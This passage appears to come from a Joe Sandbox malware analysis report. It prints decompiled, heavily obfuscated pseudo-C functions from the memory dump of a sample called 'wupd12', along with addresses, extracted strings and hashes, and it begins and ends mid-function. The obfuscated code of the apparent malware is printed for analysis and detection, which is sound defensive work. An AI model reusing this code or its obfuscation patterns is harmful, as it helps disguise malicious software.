				_v8 = _v8 & 0x00000000;
				_a12 = _a12 & 0x0000f7ac;
				_t111 = E004CB6DF((((((_t96 + 0x10dc9 | _t116) & 0x00000000) + 0x00000001 ^ _t130 ^ 0x00000000) & 0x00000000) + 0x0000564b - 0x0000e69b & 0x89c8) - 0x0000c95d ^ 0x00000b0f, __ebx,  *((intOrPtr*)(__ebx + 0x403748)),  *((intOrPtr*)(__ebx + 0x403744)));
				 *(__ebx + 0x403298) =  *(__ebx + 0x403298) ^ 0x0000f7f0;
				_a8 = _a8 + (_t116 ^ _a12) - 0x5319;
				return _t111;
			}

0x004c2131
0x004c2136
0x004c213d
0x004c214a
0x004c215b
0x004c2162
0x004c2168
0x004c217a
0x004c217d
0x004c218c
0x004c2192
0x004c219c
0x004c219f
0x004c21a2
0x004c21b4
0x004c21c8
0x004c21d6
0x004c21d9
0x004c21ef
0x004c21f7
0x004c21fd
0x004c21ff
0x004c2204
0x004c2207
0x004c220a
0x004c2224
0x004c2227
0x004c222c
0x004c222f
0x004c2238
0x004c223f
0x004c2242
0x004c2258
0x004c2262
0x004c226a
0x004c2288
0x004c22a1
0x004c22b4
0x004c22b9
0x004c22c3
0x004c22cc

Strings

Hv, xrefs: 004C21C8
$Q, xrefs: 004C214A
B, xrefs: 004C21EF

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: $Q$B$Hv
API String ID: 0-1252182520
Opcode ID: 9804955cb5dc0f6fcd8456006751dcae9258e7be119bee403f2c38d71c90c8e6
Instruction ID: 25eaef2f5d911798d20576db8665916cfeaeb0e323e5ede9fcf3c293b09ae2b8
Opcode Fuzzy Hash: 9804955cb5dc0f6fcd8456006751dcae9258e7be119bee403f2c38d71c90c8e6
Instruction Fuzzy Hash: 36416372910605EFFB00CF65D94A79E7B74FB4031AF1881AE9C189A196C77C8B249F54

Uniqueness

Uniqueness Score: 100.00%

Function 004C70A7, Relevance: 3.9, Strings: 3, Instructions: 105
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C70A7(signed int __eax, void* __ebx, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				void* _t76;
				signed int _t105;
				signed int _t111;
				signed int _t121;
				signed int _t122;

				_a12 = _a12 - _t121;
				_v8 = _t111;
				_t76 = E004CC1B9(__eax & 0x00000000, __ebx,  *((intOrPtr*)(__ebx + 0x499414)));
				_v8 = _v8 + 1;
				 *((intOrPtr*)(__ebx + 0x403458)) =  *((intOrPtr*)(__ebx + 0x403458)) + _t111;
				_a8 = 0x25a3;
				_v8 = _v8 + 1;
				 *((intOrPtr*)(__ebx + 0x403458)) = 0xe322;
				_v8 = _v8 - 1;
				 *(__ebx + 0x40345c) =  *(__ebx + 0x40345c) & (_t105 ^ 0x00001fbc);
				 *(__ebx + 0x40345c) =  *(__ebx + 0x40345c) + 1;
				_t122 = _t121 ^ _v8;
				 *(__ebx + 0x40345c) =  *(__ebx + 0x40345c) ^ _t122;
				_a4 = _a4 + 0x496a;
				_v8 = _v8 ^ 0x00002702;
				_v8 = _v8 - 1;
				 *((intOrPtr*)(__ebx + 0x403458)) =  *((intOrPtr*)(__ebx + 0x403458)) - 1;
				_v8 = _v8 + 1;
				E004CC1B9(E004C909D(((_t76 + 0xe746 & 0x00002917 ^ 0x0000b124) & 0x000068bf) + 0x00002750 ^ 0x00001cac, __ebx,  *((intOrPtr*)(__ebx + 0x403950)),  *((intOrPtr*)(__ebx + 0x40394c))) & 0x00009348, __ebx,  *((intOrPtr*)(__ebx + 0x40395c)));
				_v8 = _v8 & 0x000019da;
				 *(__ebx + 0x40345c) = 0xad9e;
				_a12 = 0xad9e;
				 *(__ebx + 0x40345c) =  *(__ebx + 0x40345c) ^ 0x00000000;
				 *(__ebx + 0x40345c) =  *(__ebx + 0x40345c) ^ _t122;
				_v8 = _v8 + 1;
				_v8 = _v8 + 0xad9e;
				_a8 = _a8 & 0x0000069e;
				 *(__ebx + 0x40345c) =  *(__ebx + 0x40345c) ^ 0x00000000;
				 *(__ebx + 0x40345c) =  *(__ebx + 0x40345c) & 0x0000ad9e;
				return E004C1D97(0xc062, __ebx,  *((intOrPtr*)(__ebx + 0x403958)),  *((intOrPtr*)(__ebx + 0x403954))) + 0x00004dcd - 0x000035ac + 0x1b207 ^ 0x00000000;
			}

0x004c70b2
0x004c70b5
0x004c70c3
0x004c70c8
0x004c70cb
0x004c70d1
0x004c70dd
0x004c70e7
0x004c70f6
0x004c70f9
0x004c7109
0x004c711b
0x004c7120
0x004c7131
0x004c7143
0x004c714a
0x004c7154
0x004c7161
0x004c7188
0x004c718d
0x004c71d1
0x004c71dd
0x004c71e2
0x004c71f0
0x004c7205
0x004c7208
0x004c720b
0x004c7212
0x004c7219
0x004c7267

Strings

"g, xrefs: 004C715A
", xrefs: 004C70E7
jI, xrefs: 004C7131

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: "g$"$jI
API String ID: 0-2163549983
Opcode ID: 4a71965b36f49ab45ec0a6814529f8d703cc55950f1ed1cad2288469a3a7beb3
Instruction ID: 021e2cb3c0f60e4902be16d11024b40a7e817d7b51206ba29253695dede11fe0
Opcode Fuzzy Hash: 4a71965b36f49ab45ec0a6814529f8d703cc55950f1ed1cad2288469a3a7beb3
Instruction Fuzzy Hash: 5441BDB3D10204ABFB059F11C98679A7B75EB90316F18C17A9C08AE187C77C9B259F18

Uniqueness

Uniqueness Score: 100.00%

Function 004C16EF, Relevance: 3.9, Strings: 3, Instructions: 103
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C16EF(signed int __eax, void* __ebx, intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				void* _t92;
				signed int _t93;
				signed int _t100;
				signed int _t105;
				signed int _t106;
				void* _t107;
				void* _t111;
				signed int _t122;

				_a4 = _a4 + 1;
				_v8 = _v8 | _t122;
				 *(__ebx + 0x403318) =  *(__ebx + 0x403318) & _t105;
				 *(__ebx + 0x403318) =  *(__ebx + 0x403318) + 1;
				_a4 = _a4 - 0xb1b4;
				_a8 = _a8 ^ 0x0000c6a6;
				_a4 = _a4 + (__eax & 4 ^ 0x0000318a) - 0x399a;
				_v8 = _v8 + 1;
				_v8 = _v8 ^ 0x00004603;
				_v12 = _v12 - _t105;
				 *(__ebx + 0x403318) =  *(__ebx + 0x403318) | 0x00008127;
				_a12 = 0xb354;
				 *(__ebx + 0x40331c) = _t105;
				_a12 = (_t100 ^ 0x00005367) & 0x000029c5;
				_a8 = _a8 | _t105;
				_t106 = _t105 ^ 0x00001394;
				 *(__ebx + 0x40331c) =  *(__ebx + 0x40331c) - 1;
				_t88 = E004C9FA2(0, __ebx,  *((intOrPtr*)(__ebx + 0x4992a8)),  *((intOrPtr*)(__ebx + 0x4992a4)),  *((intOrPtr*)(__ebx + 0x4992a0))) + 0x199f;
				_v12 = _v12 & _t106;
				_t107 = _t106 - 1;
				_v8 = _v8 - _t107;
				_v12 = _v12 & 0x00008127;
				 *(__ebx + 0x403318) = 0x2261;
				_t92 = E004C8046((E004C9FA2(0, __ebx,  *((intOrPtr*)(__ebx + 0x4992a8)),  *((intOrPtr*)(__ebx + 0x4992a4)),  *((intOrPtr*)(__ebx + 0x4992a0))) + 0x0000199f ^ 0x00000000) - 0x3c2a + 0x40b5, __ebx, (E004C9FA2(0, __ebx,  *((intOrPtr*)(__ebx + 0x4992a8)),  *((intOrPtr*)(__ebx + 0x4992a4)),  *((intOrPtr*)(__ebx + 0x4992a0))) + 0x0000199f ^ 0x00000000) - 0x3c2a + 0x40b5);
				_v12 = _v12 ^ 0x000076ae;
				 *(__ebx + 0x403318) =  *(__ebx + 0x403318) | 0x0000cfbc;
				_v8 = _t107 - 0xffffffffffff1c7d;
				 *(__ebx + 0x40331c) =  *(__ebx + 0x40331c) & 0x00002376;
				_v8 = _v8 - 0x6366;
				_t93 = E004C9539(_t92, __ebx,  *(__ebx + 0x403318) & _t111 - 0x00000001 - _t88,  *((intOrPtr*)(__ebx + 0x49929c)));
				_v12 = _v12 - 0x20f6;
				_a4 = 0x8127;
				 *(__ebx + 0x403318) =  *(__ebx + 0x403318) ^ _t93 & 0x40d;
				 *(__ebx + 0x40331c) =  *(__ebx + 0x40331c) ^ 0x000092a4;
				return 0xda0f;
			}

0x004c16fa
0x004c16fd
0x004c1718
0x004c171e
0x004c1724
0x004c1735
0x004c173c
0x004c1744
0x004c1753
0x004c175a
0x004c1762
0x004c176f
0x004c177e
0x004c1787
0x004c178a
0x004c178d
0x004c1793
0x004c17b8
0x004c17bf
0x004c17c2
0x004c17c9
0x004c17d3
0x004c17f7
0x004c1807
0x004c1811
0x004c1818
0x004c1822
0x004c182a
0x004c1834
0x004c1842
0x004c184c
0x004c186b
0x004c1870
0x004c1876
0x004c1891

Strings

a", xrefs: 004C17F7
fc, xrefs: 004C1834
v#, xrefs: 004C182A

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: a"$fc$v#
API String ID: 0-1725664231
Opcode ID: aea3e06ee7a294b66a552be1399aa89c52a24151912991afc9cf4818aec1cf1d
Instruction ID: a35d3cfdc15ebe4760f5ee06f9f4c6226fa708a5961d205bf9867cf293daa3a5
Opcode Fuzzy Hash: aea3e06ee7a294b66a552be1399aa89c52a24151912991afc9cf4818aec1cf1d
Instruction Fuzzy Hash: 8541B673810605ABFB04CF29C98A79A7FA4EF80315F14C17EAC08AE185D77D8B558F94

Uniqueness

Uniqueness Score: 100.00%

Function 004C9FA2, Relevance: 3.9, Strings: 3, Instructions: 102
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C9FA2(void* __eax, void* __ebx, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t88;
				void* _t94;
				void* _t96;
				signed int _t98;
				void* _t108;
				signed int _t113;
				signed int _t114;
				void* _t119;
				void* _t120;
				signed int _t121;
				signed int _t127;
				void* _t129;

				_a4 = _a4 & 0x0000a6bc;
				 *(__ebx + 0x403508) =  *(__ebx + 0x403508) ^ 0x00000000;
				_a8 = _a8 + 0xf26f;
				_a12 = _a12 - _t129;
				_t88 = E004C9A95((__eax + 0x0000a59e | 0x00004d9f) + 0xa496 - 0xf4a9 + 0x29d6, __ebx,  *((intOrPtr*)(__ebx + 0x499498)));
				_t120 = _t119 - 1;
				_v16 = _v16 + _t120;
				_t113 = (_t108 + 0x00000001 - 0x00000001 & 0x00002776) + 0x0000df90 & 0x00009422;
				_v8 = _v8 - 1;
				 *(__ebx + 0x403508) = 0xba0b;
				_t94 = E004C33F4((_t88 & 0x00000000 ^ 0xb660) - 1 + 0x8de3, __ebx,  *((intOrPtr*)(__ebx + 0x4039cc)));
				_t121 = _t120 - 1;
				_t96 = E004C909D(_t94 - 0x6dc1, __ebx, _t113,  *((intOrPtr*)(__ebx + 0x499494)));
				_a12 = _a12 + _t96;
				_t98 = _t96 - 0x0000ba12 & 0x00000000;
				_t114 = _t113 - _t98;
				_a8 = _a8 | _t121;
				_a4 = _a4 - _t98;
				_v12 = _t114;
				 *(__ebx + 0x40350c) =  *(__ebx + 0x40350c) - _t121;
				_a4 = _a4 ^ 0x0000c8ac;
				_v12 = _v12 ^ 0x00001b0f;
				_v8 = 0x2144;
				 *(__ebx + 0x40350c) =  *(__ebx + 0x40350c) ^ 0x00001470;
				_t127 = _t94 - 0x00006dc1 & _t98 & 0x00006041 | _a12;
				_v16 = _v16 | _t114 + 0x00000001 - _a8 + 0x00000001;
				_a12 = _a12 & 0x0000221a;
				 *(__ebx + 0x403508) =  *(__ebx + 0x403508) ^ _t127;
				_a8 = _a8 | _t127;
				_a12 = _a12 | 0x00002ae0;
				_v8 = _v8 & 0x0000c8ac;
				_a12 = _a12 & 0x00000000;
				_a8 = _a8 + 0xc8ac;
				_a4 = _a4 - 0xae;
				return 0xbce7;
			}

0x004c9fad
0x004c9fb4
0x004c9fbb
0x004c9fe4
0x004ca003
0x004ca008
0x004ca009
0x004ca029
0x004ca035
0x004ca038
0x004ca04e
0x004ca064
0x004ca06c
0x004ca073
0x004ca07c
0x004ca089
0x004ca08b
0x004ca08e
0x004ca09c
0x004ca09f
0x004ca0a5
0x004ca0aa
0x004ca0be
0x004ca0c5
0x004ca0df
0x004ca0e8
0x004ca0f9
0x004ca10e
0x004ca115
0x004ca118
0x004ca124
0x004ca12e
0x004ca132
0x004ca135
0x004ca13e

Strings

D!, xrefs: 004CA0BE
*, xrefs: 004CA118
[, xrefs: 004CA0D2

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: D!$*$[
API String ID: 0-2639594066
Opcode ID: 834eadb1ee1f795470e03d84ea4cff1425789dd50ed9cba8a06402714f78a85a
Instruction ID: 7c4a04b579c1077a720f02b438ff3d666ae6da67938c4102d22b60471cc0324a
Opcode Fuzzy Hash: 834eadb1ee1f795470e03d84ea4cff1425789dd50ed9cba8a06402714f78a85a
Instruction Fuzzy Hash: 88418172820705ABFB08CF75C94A79A3F68FF40325F18C16EAC19AD095C77D86618F64

Uniqueness

Uniqueness Score: 100.00%

Function 004CC018, Relevance: 3.9, Strings: 3, Instructions: 101
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004CC018(signed int __eax, void* __ebx, signed int _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _t85;
				signed int _t105;
				signed int _t108;
				signed int _t113;
				signed int _t118;
				void* _t125;
				signed int _t126;
				signed int _t128;

				 *(__ebx + 0x40348c) =  *(__ebx + 0x40348c) & 0x0000caa7;
				_v12 = _v12 ^ 0x00000000;
				_a4 = _a4 ^ _t118;
				_v16 = _v16 | __eax;
				_t85 = E004C9700(__eax, __ebx, _a8 & _t113,  *((intOrPtr*)(__ebx + 0x499434)));
				_v16 = _t118 & 0x00000000;
				 *(__ebx + 0x403488) =  *(__ebx + 0x403488) + 0x96b3;
				_t126 = _t125 + 1;
				_v8 = _v8 + 1;
				_v8 = 0x377e;
				 *(__ebx + 0x40348c) = 0x9883;
				_a4 = _a4 & _t126;
				_t128 = _t126 ^ 0x0000309e | 0x000077d2;
				_t108 = ((_t105 | _a4) ^ _a8) - _v16;
				_v16 = _v16 - 0x844c;
				E004C9C3B(((_t85 ^ 0x00002f37) & 0x00000000) - 0x000098ec & 0x00002364, __ebx, _a8 & _t113,  *((intOrPtr*)(__ebx + 0x499430)));
				 *(__ebx + 0x403488) =  *(__ebx + 0x403488) & 0x00000000;
				_a8 = 0xcdf8;
				_v12 = _v12 - 0x77d2;
				_v12 = _v12 - 1;
				E004C9C3B( *(__ebx + 0x403488) - 0xffffffffffffe91a, __ebx,  *(__ebx + 0x403488) & _t108,  *((intOrPtr*)(__ebx + 0x403964)));
				_a8 = _a8 & 0x00000000;
				_v8 = _v8 + 0xfd3b;
				_a8 = _a8 + 0x7ce8;
				 *(__ebx + 0x403488) =  *(__ebx + 0x403488) - 0x66e4;
				_v16 = 0x77d2;
				_a4 = _a4 + 0xd5a2;
				_v16 = _v16 & _t128 & _t108;
				 *(__ebx + 0x40348c) =  *(__ebx + 0x40348c) + 1;
				_a4 = 0x1480;
				_a4 = _a4 | 0x000077d2;
				_a4 = _a4 + 1;
				_v12 = _v12 - 0xd6d9;
				_v16 = _v16 - 0x9b3b;
				_v12 = 0x4d2;
				_a4 = _a4 - 1;
				 *(__ebx + 0x403488) = (0x000077d2 & _t128) - 0x00002cf7 & _a8 ^ 0x00000000;
				 *(__ebx + 0x40348c) =  *(__ebx + 0x40348c) | 0x00006d0f;
				_v16 = _v16 - 1;
				return 0xfffffffffffea810;
			}

0x004cc026
0x004cc033
0x004cc037
0x004cc03d
0x004cc046
0x004cc058
0x004cc05b
0x004cc065
0x004cc066
0x004cc069
0x004cc07a
0x004cc084
0x004cc097
0x004cc09b
0x004cc09e
0x004cc0ab
0x004cc0b0
0x004cc0b7
0x004cc0d1
0x004cc0d6
0x004cc0e5
0x004cc105
0x004cc109
0x004cc110
0x004cc121
0x004cc138
0x004cc13b
0x004cc147
0x004cc14f
0x004cc160
0x004cc16f
0x004cc172
0x004cc17b
0x004cc185
0x004cc188
0x004cc191
0x004cc199
0x004cc19f
0x004cc1ab
0x004cc1b6

Strings

~7, xrefs: 004CC069
|, xrefs: 004CC110
f, xrefs: 004CC121

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: ~7$f$|
API String ID: 0-4170755523
Opcode ID: 5e74a3e7eeba3f77e40e09b04c2afc13369fb5eb4a61d21f0d0b166dd3f9a0b4
Instruction ID: 2e46dff8d5b7dd4f9e97241d95b71a3483c07957cd37519bf495d102bb6ccd4d
Opcode Fuzzy Hash: 5e74a3e7eeba3f77e40e09b04c2afc13369fb5eb4a61d21f0d0b166dd3f9a0b4
Instruction Fuzzy Hash: 2A418C72D10208ABFB048F75C5897AE7BB4FF80325F14C16E9C196E186C7788A54DFA4

Uniqueness

Uniqueness Score: 100.00%

Function 004C51B2, Relevance: 3.8, Strings: 3, Instructions: 100
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C51B2(void* __eax, void* __ebx, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _t72;
				void* _t96;
				void* _t103;
				signed int _t113;
				signed int _t114;

				_t72 = E004C909D(__eax, __ebx,  *((intOrPtr*)(__ebx + 0x403834)),  *((intOrPtr*)(__ebx + 0x403830)));
				_a4 = _a4 ^ 0x00000000;
				_v8 = _v8 + 1;
				_v8 = _v8 - 1;
				 *(__ebx + 0x40335c) = _t113;
				_t114 = _t113 - 1;
				_a4 = 0xe567;
				E004C8D25(((_t72 ^ 0x00007f1f) & 0x0000e966 ^ 0x00000000) - 0xffffffffffffd651 + 0x53bb, __ebx,  *(__ebx + 0x40335c) & _t103 + 0x0000ba5b, 0xa8bb);
				 *(__ebx + 0x40335c) =  *(__ebx + 0x40335c) & _t114;
				 *(__ebx + 0x403358) =  *(__ebx + 0x403358) ^ 0x00000000;
				 *(__ebx + 0x40335c) =  *(__ebx + 0x40335c) + 1;
				 *(__ebx + 0x403358) =  *(__ebx + 0x403358) ^ 0x0000a8bb;
				 *(__ebx + 0x403358) =  *(__ebx + 0x403358) + 0x575e;
				 *(__ebx + 0x403358) = 0xafd1;
				_a4 = 0xe432;
				_v8 = _t114;
				 *(__ebx + 0x40335c) =  *(__ebx + 0x40335c) - (_t96 + 3 & _t103 + 0x0000ba5b - 0x0000fb39);
				_a4 = _a4 | 0x0000f3cd;
				 *(__ebx + 0x40335c) =  *(__ebx + 0x40335c) & 0x0000ce0b;
				 *(__ebx + 0x40335c) = 0xe3ad;
				_v8 = _v8 | (0xbcdf +  *(__ebx + 0x403358) ^  *(__ebx + 0x403358)) - 0x00000001;
				_a4 = 0xd5bc + _a4;
				_a4 = _a4 | 0x0000d016;
				_a4 = 0x21fc;
				_a4 = _a4 + 1;
				return 0x2d10;
			}

0x004c51c9
0x004c51dc
0x004c51e5
0x004c5210
0x004c5213
0x004c5219
0x004c5226
0x004c5230
0x004c523a
0x004c5245
0x004c524e
0x004c5257
0x004c525f
0x004c5277
0x004c5281
0x004c528f
0x004c529c
0x004c52bb
0x004c52c2
0x004c52e5
0x004c532b
0x004c532e
0x004c5342
0x004c5349
0x004c5355
0x004c5363

Strings

R, xrefs: 004C5331
^W, xrefs: 004C525F
2, xrefs: 004C5281

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: 2$^W$R
API String ID: 0-1322289480
Opcode ID: a7333eca2129699bb69c479a92c0c8f019acb788ee8f0bec9db8fdf031441bde
Instruction ID: 67698221c78f054bb90ed0054cdf2bb10ac4b0d05f76f774360f49558d7c3249
Opcode Fuzzy Hash: a7333eca2129699bb69c479a92c0c8f019acb788ee8f0bec9db8fdf031441bde
Instruction Fuzzy Hash: E341D772900744ABFB049F11C98676A3FA4EF8031AF1DC17A9C08AE1C5CB7C8B549F54

Uniqueness

Uniqueness Score: 100.00%

Function 004C633B, Relevance: 3.8, Strings: 3, Instructions: 97
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C633B(void* __eax, void* __ebx, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				void* _t89;
				signed int _t102;
				signed int _t111;
				signed int _t123;
				void* _t124;
				signed int _t126;
				signed int _t132;

				 *(__ebx + 0x403450) =  *(__ebx + 0x403450) & _t111;
				_a8 = 0xb126;
				_v12 = _v12 | _t132;
				 *(__ebx + 0x403450) =  *(__ebx + 0x403450) ^ _t126;
				_a8 = _a8 + 0x2554;
				_v8 = 0x6e48;
				_t123 = _t111 ^ _v8 ^ _t126 ^ _v8;
				_t89 = E004C29E6(((__eax + 0x0000f4fc ^ 0x00009fd0) & 0x000087fd | 0x000044a1) + 0x846d, __ebx,  *((intOrPtr*)(__ebx + 0x499410)));
				_v8 = _v8 + 0x3dd8;
				_a4 = 0x9f19;
				_a8 = _a8 | 0x00001107;
				 *(__ebx + 0x403450) =  *(__ebx + 0x403450) + 0xa3a;
				 *(__ebx + 0x403450) = _t123;
				 *(__ebx + 0x403454) =  *(__ebx + 0x403454) ^ 0x00000000;
				_a8 = _a8 | 0x000097d9;
				_t124 = _t123 + _a4;
				_v12 = _v12 - 0x6d88;
				 *(__ebx + 0x403450) =  *(__ebx + 0x403450) & _t132 + 0x00000001 + _a4;
				_t102 = ((_t89 - 0x0000eb72 + _t123 - 0x00000001 + 0x0000c8e5 ^ 0x32c7) - 0x00008ff3 & 0x0000192a) + 1 - 0x4b70 + _t124;
				 *(__ebx + 0x403454) = _t102;
				_a4 = _a4 ^ 0x0000f065;
				_v12 = _v12 - _t102;
				_a4 = _a4 + 0x814d;
				_v8 = _v8 ^ _t124 - 0x00000001;
				_a4 = _a4 & 0x00000000;
				 *(__ebx + 0x403450) =  *(__ebx + 0x403450) - _t102 + 0x4650;
				_v8 = 0xcdc2;
				return _v8 & 0x000020d8;
			}

0x004c634d
0x004c6358
0x004c636d
0x004c6370
0x004c6384
0x004c63b1
0x004c63bf
0x004c63c8
0x004c63cd
0x004c63ef
0x004c63f6
0x004c642d
0x004c6437
0x004c643d
0x004c6444
0x004c644b
0x004c644f
0x004c645e
0x004c646f
0x004c6471
0x004c647e
0x004c6485
0x004c6488
0x004c6493
0x004c649b
0x004c649f
0x004c64c2
0x004c64df

Strings

:, xrefs: 004C642D
A\, xrefs: 004C64B7
Hn, xrefs: 004C63B1

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: :$A\$Hn
API String ID: 0-12856895
Opcode ID: 95c59591c145358e3083c50e14f730f117656e4d5ad801acad5b69504003343b
Instruction ID: b912ae0d7c80bae320a60004c2e209a4b92a3b913bebfc2a5c638a8b99f03837
Opcode Fuzzy Hash: 95c59591c145358e3083c50e14f730f117656e4d5ad801acad5b69504003343b
Instruction Fuzzy Hash: 16419C72910609ABFB04CF21C94A79A3BB5FF40329F18C17AAD099D5C6C7BC87589F44

Uniqueness

Uniqueness Score: 100.00%

Function 004C8B98, Relevance: 3.8, Strings: 3, Instructions: 95
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C8B98(void* __eax, void* __ebx, intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _t83;
				signed int _t86;
				void* _t96;
				signed int _t103;
				signed int _t104;
				void* _t105;
				signed int _t107;
				void* _t110;
				signed int _t112;
				void* _t118;

				 *(__ebx + 0x403544) =  *(__ebx + 0x403544) ^ _t112;
				 *(__ebx + 0x403540) =  *(__ebx + 0x403540) - 0x9502;
				_v8 = 0xfff;
				_t104 = _t103 ^ _v8;
				_v8 = _v8 + 1;
				_v8 = _v8 - 1;
				_a4 = _a4 + 0xfaef;
				_v8 = _t104;
				_a4 = _a4 - _t118;
				_t83 = ((__eax + _a12 + 0x00000001 ^ 0x00000000) + 0x0000eb48 - 0x0000df45 ^ 0x00007666) + 0xc409;
				_v8 = _v8 ^ _t104;
				_t105 = _t104 + 1;
				 *(__ebx + 0x403544) =  *(__ebx + 0x403544) - _t83;
				_v8 = 0x60a6;
				 *(__ebx + 0x403544) =  *(__ebx + 0x403544) + _t105;
				_a12 = 0x267c;
				_t86 = _t83 ^ 0x3d09 | (_t118 +  *(__ebx + 0x403544) - 0x00000001 | 0x00002941) ^ 0x000017da;
				_a8 = 0xa2f8;
				 *(__ebx + 0x403540) =  *(__ebx + 0x403540) | 0x0000587c;
				 *(__ebx + 0x403540) = 0xae9e;
				 *(__ebx + 0x403540) =  *(__ebx + 0x403540) + 1;
				_a12 = _a12 + 0xacf5;
				 *(__ebx + 0x403544) =  *(__ebx + 0x403544) | _t96 + 0x00000001 - 0x000023f0;
				_t107 = _t105 +  *(__ebx + 0x403540) & _t86;
				 *(__ebx + 0x403544) =  *(__ebx + 0x403544) - 1;
				_v8 = _v8 - 1;
				 *(__ebx + 0x403540) =  *(__ebx + 0x403540) - 1;
				_v8 = _t107;
				 *(__ebx + 0x403540) =  *(__ebx + 0x403540) - 1;
				 *(__ebx + 0x403540) =  *(__ebx + 0x403540) + 0x993f;
				 *(__ebx + 0x403544) =  *(__ebx + 0x403544) + _t86 + 0xebba - 0x3182;
				 *(__ebx + 0x403540) =  *(__ebx + 0x403540) & 0x00004ca6;
				_t110 = (_t107 ^ _a12) + 1;
				_a8 = _a8 | _t110 + 0x00000001;
				return _t110 + 0x9dd;
			}

0x004c8ba3
0x004c8bac
0x004c8bb8
0x004c8bbf
0x004c8bcc
0x004c8bcf
0x004c8bda
0x004c8beb
0x004c8bee
0x004c8bf1
0x004c8c02
0x004c8c05
0x004c8c07
0x004c8c20
0x004c8c27
0x004c8c2d
0x004c8c4a
0x004c8c4c
0x004c8c5a
0x004c8c64
0x004c8c70
0x004c8c76
0x004c8c7f
0x004c8c85
0x004c8c87
0x004c8c8d
0x004c8cab
0x004c8cbf
0x004c8cc9
0x004c8ccf
0x004c8ceb
0x004c8cfa
0x004c8d0f
0x004c8d19
0x004c8d22

Strings

4a, xrefs: 004C8C53
|X, xrefs: 004C8C5A
|&, xrefs: 004C8C2D

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: 4a$|&$|X
API String ID: 0-3042737843
Opcode ID: 1480d285e13fb02d8b2153ac86bc3e91b23f7523557a34aed55d40023b693ed3
Instruction ID: a9af911bade287b7f727c72d47689fde4679dfd66c8d0ea64e7ba0f092f6f89b
Opcode Fuzzy Hash: 1480d285e13fb02d8b2153ac86bc3e91b23f7523557a34aed55d40023b693ed3
Instruction Fuzzy Hash: 1C419172D00214AFFB48CE25C94935ABBB8FF4071AF29817ADD09EA1D6E77847118B54

Uniqueness

Uniqueness Score: 100.00%

Function 004CCB92, Relevance: 3.8, Strings: 3, Instructions: 95
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004CCB92(signed int __eax, void* __ebx, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t72;
				signed int _t90;
				void* _t97;
				signed int _t103;
				void* _t108;
				signed int _t110;
				signed int _t113;
				signed int _t115;

				 *(__ebx + 0x403480) = _t90;
				_a4 = _a4 - __eax;
				_t110 = _t108 - 0x0000beb4 & 0x0000939e;
				 *(__ebx + 0x403480) =  *(__ebx + 0x403480) ^ _t113;
				 *(__ebx + 0x403484) = 0x32e2;
				 *(__ebx + 0x403484) =  *(__ebx + 0x403484) & 0x000009bc;
				 *(__ebx + 0x403480) =  *(__ebx + 0x403480) | 0x00004d8f;
				_t115 =  *(__ebx + 0x403480);
				 *(__ebx + 0x403484) =  *(__ebx + 0x403484) - 1;
				_v8 = _t115;
				 *(__ebx + 0x403480) =  *(__ebx + 0x403480) ^ _t115;
